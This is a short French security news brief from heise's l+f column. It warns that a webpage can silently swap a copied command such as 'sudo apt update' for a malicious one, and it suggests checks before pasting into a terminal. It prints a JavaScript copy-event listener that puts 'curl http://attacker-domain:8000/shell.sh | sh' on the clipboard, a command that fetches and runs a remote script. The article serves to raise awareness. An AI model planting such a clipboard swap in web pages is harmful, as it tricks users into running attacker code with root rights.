AccueilActualités informatiquel+f : Un copier-coller déguisé en cheval de Troie

l+f : Un copier-coller déguisé en cheval de Troie

l+f:

Les développeurs ne sont pas les seuls à copier-coller des commandes depuis des sites web lorsqu’ils travaillent sur des projets. Les novices en matière de Linux collent également des commandes dans le terminal, par exemple pour mettre à jour Ubuntu. Dans certaines conditions, cela pourrait constituer une porte d’entrée pour les pirates et permettre à des codes malveillants de s’infiltrer dans les ordinateurs.

Sommaire

C’est la mise en garde d’un chercheur en sécurité de Wizer dans un article. Il n’est toutefois pas le premier à esquisser un tel scénario d’attaque. Dans son exemple, les utilisateurs pensent qu’après la copie, la commande sudo apt update apparaît dans le presse-papiers et après le collage dans le terminal. Or, ce n’est pas le cas.

Un JavaScript veille, à l’aide d’un « event listener », à ce que la commande curl http://attacker-domain:8000/shell.sh | sh arrive dans le terminal et est directement exécutée.

<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | shn');
e.preventDefault(); });
</script>

De cette manière, l’attaquant pourrait tromper les victimes en copiant des commandes prétendument légitimes dans le terminal. En réalité, un script contenant du code malveillant est lancé à partir d’un site web contrôlé par l’attaquant. Si cela se produit en combinaison avec sudo et donc des droits root, cela peut avoir de graves conséquences pour le système.

Pour prévenir ce problème de sécurité, on pourrait coller au préalable les commandes copiées dans un document texte afin de vérifier ce qui arrive réellement. On peut également utiliser le terminal pour copier la commande avant de la coller en tapant # pour en faire un commentaire et empêcher l’exécution directe de cette manière.

Plus d’infos

lost+found

La rubrique de heise-Security pour les brèves et les bizarreries de la sécurité informatique.

Aperçu de tous les messages l+f

Plus d'articles